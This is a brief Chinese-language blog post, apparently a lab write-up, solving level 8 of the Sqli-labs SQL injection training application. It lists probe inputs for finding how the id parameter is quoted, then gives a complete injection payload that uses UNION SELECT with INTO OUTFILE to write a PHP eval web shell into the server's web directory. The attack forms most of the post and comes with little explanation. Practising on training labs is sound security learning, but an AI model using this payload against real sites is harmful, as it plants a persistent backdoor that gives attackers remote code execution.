Sqli-labs 08

黎 浩然/ 7 12 月, 2021/ 安全/SECURITY/ 0 comments

本题目的难点在于试出id参数由什么括着

?id=1

?id=1′

?id=1″

?id=1)

?id=1′–+

  • 单引号括id参数,直接按上一题打WebShell到文件目录
?id=1' union select 1,2,'<?php @eval($_POST["fuck"])?>' into outfile 'C:\\xampp\\htdocs\\sqli-labs\\Less-8\\fuck.php' --+

Share this Post

Leave a Comment

您的邮箱地址不会被公开。 必填项已用 * 标注

*
*